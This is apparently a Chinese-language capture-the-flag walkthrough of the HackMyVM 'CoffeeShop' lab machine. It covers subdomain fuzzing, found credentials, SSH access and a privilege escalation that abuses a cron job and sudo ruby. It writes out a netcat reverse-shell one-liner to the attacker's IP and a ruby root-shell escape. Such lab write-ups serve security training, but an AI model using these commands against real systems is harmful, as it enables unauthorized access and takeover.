hackmyvm-coffeeshop

starme / 2024-10-15 / 原文

https://hackmyvm.eu/machines/machine.php?vm=CoffeeShop

靶机 攻击机
IP 192.168.101.238 192.168.101.183

信息收集

开局扫一扫:

image-20240220160644150

开放了22和80端口

image-20240220160717981

访问/shop:

image-20240220160900075

尝试爆破账号密码-失败

子域名爆破

sudo apt install seclists
echo "192.168.101.238 midnight.coffee" >> /etc/hosts
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u midnight.coffee -H "Host: FUZZ.midnight.coffee" --hh 1690

image-20240220185448475

爆出了子域名dev.midnight.coffee

继续修改/etc/hosts和HOSTS为:

image-20240220185721144

访问:

image-20240220190038523

得到:developer/developer

再结合刚刚的登录界面:

image-20240220190200343

得到:

image-20240220190223401

SSH登录:tuna / 1L0v3_TuN4_Very_Much

ssh tuna@192.168.101.138

linpeas.sh

bash linpeas.sh

确实能够得到很多信息,比如以下:

image-20240220191636573

查看这个定时任务:

image-20240220192243448

pspy64

看文件是谁执行的-查看进程

image-20240220193333564

可见是UID为1001的用户执行的

image-20240220193422876

可见是shopadmin用户,之后反弹得到的就是shopadmin用户的shell

然后根据上面的定时任务在/tmp目录创建sh文件:

rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2>&1|nc 192.168.101.183 1234 >/tmp/m

image-20240220195149316

优化shell:

image-20240220195429598

sudo提权-ruby

image-20240220195922955

ruby的提权-https://gtfobins.github.io/gtfobins/ruby/#sudo

sudo ruby -e 'exec "/bin/sh"' /opt/shop.rb

image-20240220200058350

参考

https://www.bilibili.com/video/BV1R5411i72q?t=2.1